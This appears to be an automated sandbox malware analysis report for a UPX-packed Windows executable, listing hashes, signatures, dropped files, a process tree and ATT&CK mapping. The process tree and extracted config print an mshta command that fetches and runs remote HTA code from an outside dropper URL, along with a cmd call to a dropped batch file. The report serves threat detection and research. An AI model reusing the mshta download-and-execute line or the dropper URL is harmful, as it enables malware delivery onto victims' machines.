f81cea3cf23dc2d75ad5c9deb707b07807c90a55520e441a7630aa7573f95bb0

General

Target

4ccacea000c555b1a333175803ba0af5.exe
Size

691KB
MD5

4ccacea000c555b1a333175803ba0af5
SHA1

8e919e3a04036ee3b5122d3fb047d907d23d1e3d
SHA256

f81cea3cf23dc2d75ad5c9deb707b07807c90a55520e441a7630aa7573f95bb0
SHA512

0bca51112c16fe66ac910289bf665168f25d71c4101123987c0afafdc698b93549eaf82e64be315ff9296cb3710a7d6375543952ab8e13f8d0aaf8de795d13ea
SSDEEP

12288:MSJsWPOGw+qYwxPsw5gubWPRJ+wsHdLgRU3M7tToSGRpQ7E5x36NuP:MSnwKwauipJXlCc7tkSGRWix36

Score

10^/10

upx

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://rerererererere.com/inst.php?id=forbidden

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2728	z.exe

Loads dropped DLL 2 IoCs

pid	Process
3048	4ccacea000c555b1a333175803ba0af5.exe
3048	4ccacea000c555b1a333175803ba0af5.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3048-0-0x0000000000400000-0x0000000000507000-memory.dmp	upx
behavioral1/files/0x0009000000012224-14.dat	upx
behavioral1/memory/3048-18-0x00000000030C0000-0x00000000034BC000-memory.dmp	upx
behavioral1/files/0x0009000000012224-23.dat	upx
behavioral1/memory/2728-19-0x0000000000400000-0x00000000007FC000-memory.dmp	upx
behavioral1/memory/3048-17-0x0000000000400000-0x0000000000507000-memory.dmp	upx
behavioral1/files/0x0009000000012224-16.dat	upx
behavioral1/files/0x0009000000012224-12.dat	upx
behavioral1/files/0x0009000000012224-10.dat	upx
behavioral1/memory/2728-36-0x0000000000400000-0x00000000007FC000-memory.dmp	upx
behavioral1/memory/2728-37-0x0000000000400000-0x00000000007FC000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2728	z.exe
2728	z.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 3048 wrote to memory of 2728	3048	4ccacea000c555b1a333175803ba0af5.exe	24
PID 3048 wrote to memory of 2728	3048	4ccacea000c555b1a333175803ba0af5.exe	24
PID 3048 wrote to memory of 2728	3048	4ccacea000c555b1a333175803ba0af5.exe	24
PID 3048 wrote to memory of 2728	3048	4ccacea000c555b1a333175803ba0af5.exe	24

C:\Users\Admin\AppData\Local\Temp\4ccacea000c555b1a333175803ba0af5.exe
"C:\Users\Admin\AppData\Local\Temp\4ccacea000c555b1a333175803ba0af5.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3048
- C:\Users\Admin\AppData\Roaming\z.exe
  "C:\Users\Admin\AppData\Roaming\z.exe" forbidden
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2728

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\dgfdgsdf.bat" "
1⤵
PID:1312

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" http://rerererererere.com/inst.php?id=forbidden
1⤵
PID:2588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\dgfdgsdf.bat

Filesize
167B

MD5
e5a2cf708be039ebe72233673c1f2ac7

SHA1
cca4b5f8c08e07779f4eddd7e3c960d7f68078f8

SHA256
1f67a80290e77b7ec48c8b676bcc076ff5b271e2caf17352b1880d65a956e43c

SHA512
0d47a1ccf419c4cb8fc1a25b35470ba3b51e49a6045fe1efcd533ebbe9d69a92a1a7b60f2666e1419613c0bd45ffd128623adb11c313c1b3749727f5a4a9f645

Download Submit
C:\Users\Admin\AppData\Roaming\z.exe

Filesize
2KB

MD5
8dd8a82ab6a26e8334c40c7f27dadeeb

SHA1
0c113f851beb5e826619a532f43c188eb3318462

SHA256
493b37eb7748239d3e6ef899de9f86cd4124b4e6aeecd2a09a2afed35c74b27a

SHA512
886602b8a1c43cc295c4a55ec7921af40ed1cd7654aa7d393a6ef117c7b78e3875b97e60229c80c86e078acaaec632c9bfcd6338d7760c9242aa85792e2bf331

Download Submit
C:\Users\Admin\AppData\Roaming\z.exe

Filesize
1KB

MD5
64493807b631d4640721422f65db10f4

SHA1
426ef0d69ec6c4b7d60931efc2c312a1670b6ded

SHA256
17868f7672fb1ef5d208e640ef963b3f5257ec6dfabd8538b77c95b7a6f685ce

SHA512
9d3d0be0e1fe2868b462f0cdeff0a26e483edc4ff2b616ab557e650568465c143865fb70cd15df478d15609a5c2a00063e0792f05bc8f07c332f34e2d27b307f

Download Submit
\Users\Admin\AppData\Roaming\z.exe

Filesize
12KB

MD5
294d4f3a470fd19559b3714967a238a1

SHA1
4231bbd7ebe6e1413ec06528532da616cb3e74b9

SHA256
065ead59437163606059257e4efb110e2313b524c8ffb0d5bc964512994e2571

SHA512
a576888b91cbb8332c9246bd12565474026ed256864c4cc334311becc1a3af6663e9c853ba51d7b2ab022468d81d376b98de82ca9582f3ba1685f24fdbe7e9ef

Download Submit
\Users\Admin\AppData\Roaming\z.exe

Filesize
45KB

MD5
a02ded02c5c7d23f5678a922dab56726

SHA1
4f42ce884ddfec7577d3f340deca9565feb7ecaa

SHA256
49edb7ecf9ea7cb90a59ebda9f7adcc1af8694f432b51ca74fd41ba378a5ca65

SHA512
f35213cf69e978b000e79dd377c434eaac6cfe37fc47f6e4568f9da7531394ad2142383cdc19d30868488c62518f8f4fa8a8a27d2b24f121067746b2dce3eb26

Download Submit
memory/2728-20-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2728-25-0x0000000003CF0000-0x0000000003D00000-memory.dmp

Filesize
64KB

Download
memory/2728-19-0x0000000000400000-0x00000000007FC000-memory.dmp

Filesize
4.0MB

Download
memory/2728-36-0x0000000000400000-0x00000000007FC000-memory.dmp

Filesize
4.0MB

Download
memory/2728-38-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2728-37-0x0000000000400000-0x00000000007FC000-memory.dmp

Filesize
4.0MB

Download
memory/2728-40-0x0000000003CF0000-0x0000000003D00000-memory.dmp

Filesize
64KB

Download
memory/3048-17-0x0000000000400000-0x0000000000507000-memory.dmp

Filesize
1.0MB

Download
memory/3048-0-0x0000000000400000-0x0000000000507000-memory.dmp

Filesize
1.0MB

Download
memory/3048-18-0x00000000030C0000-0x00000000034BC000-memory.dmp

Filesize
4.0MB

Download
memory/3048-1-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing